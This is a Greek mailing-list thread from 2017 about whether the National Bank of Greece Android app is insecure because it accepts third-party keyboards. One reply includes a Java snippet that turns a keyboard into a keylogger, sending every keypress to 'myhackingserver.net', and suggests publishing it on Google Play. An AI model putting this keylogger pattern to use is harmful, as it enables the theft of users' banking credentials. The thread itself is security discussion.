Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Ioannis Proios <john.proios@gmail.com>]

Στις Τρί, 3 Οκτ 2017 στις 4:57 μ.μ., ο/η Nikolas Pattakos <pattakosn@fastmail.com> έγραψε:

On Tue, Oct 3, 2017, at 07:26 AM, Ioannis Proios wrote:
> Καλημέρα.
>
> Ναι δεν είναι bug αλλά σίγουρα είναι δουλειά της εφαρμογής.
> Όπως δηλαδή και με το login του browser, αν η τράπεζα δεν απαιτούσε SSL
> θα
> λέγαμε ότι φταίει ο browser που δεν το κάνει από μόνος.

Δεν ασχολούμαι ιδιαίτερα με android ούτε έχω εθνική αλλά αφού επιμένεις:

1)  αν νομίζεις ότι έχεις βρει κάποιο κενό ασφαλείας, μπορείς να μου
(μας) πεις ποιο είναι αυτό που χρησιμοποιεί και τι θα έπρεπε να
χρησιμοποιεί για να μην θεωρείς ότι έχει κενό ασφαλείας.

2) ακόμα καλύτερα μπορείς να το χακάρεις; αν όχι ένα proof of concept
έστω ένα draft?

Επειδή θα "ανοίξω την όρεξη" σε κάποιους για hacking και ίσως αυτό βοηθήσει να κλείσουν το σφάλμα θα δείξω πόσο απλό είναι :

1) ας πάρουμε ένα καλό πληκτρολόγιο πχ αυτό https://tinyurl.com/y8fqpade

2) ας προσθέσουμε λίγο κώδικα στην μέθοδο onPress εδώ https://tinyurl.com/ybe2qm5v πχ 

    HttpClient httpclient = new DefaultHttpClient();

    HttpPost httppost = new HttpPost("http://myhackingserver.net/onpress");

    try {

        // Add your data

        List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);

        nameValuePairs.add(new BasicNameValuePair("pressdata", primaryCode));

        httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));

        // Execute HTTP Post Request

        HttpResponse response = httpclient.execute(httppost);

    } catch (ClientProtocolException e) {

    } catch (IOException e) {

    }

3) το ανεβάσουμε στο google play για κάθε χρήση

Ελπίζω τώρα την επόμενη φορά που θα κάνεις login στην τράπεζα να το σκεφτείς καλά ;)

 

> Επειδή λοιπόν μιλάμε για την υπ.αριθμόν 1(?) τράπεζα της Ελλάδος θεωρώ
> τραγικό λάθος να παραβλέψει το θέμα ασφαλείας.
> Ένας λόγος παραπάνω έπρεπε να δώσει μεγαλύτερη προσοχή επειδή είχε να
> κάνει
> με ένα open source OS και όχι να το αφήσει κατά το "δοκούν".

Πρώτον δεν είναι όλα στο android open source. ξέρεις ποιον κώδικα
χρησιμοποιεί αυτό που ισχυρίζεσαι ότι δεν είναι ασφαλές και αν είναι
open source ή proprietary?
Δεύτερον, η σύνδεση που κάνεις στο επειχείρημά σου μεταξύ open source
και μεγαλύτερης προσοχής είναι νομίζω μεταξύ ασαφής, συζητήσιμης ίσως
και αβάσιμης.

το opensource το ανέφερα επειδή εδώ (android) τα πράγματα είναι ποιο ευέλικτα και θα περίμενε κάποιος να δώσει μεγαλύτερη προσοχή σε θέματα ασφαλείας όπως πχ η Εθνική.

Αν είμαστε σε M$ πχ δεν θα το συζητήσουμε κάν και θα κοιμόμασταν ήσυχοι ;)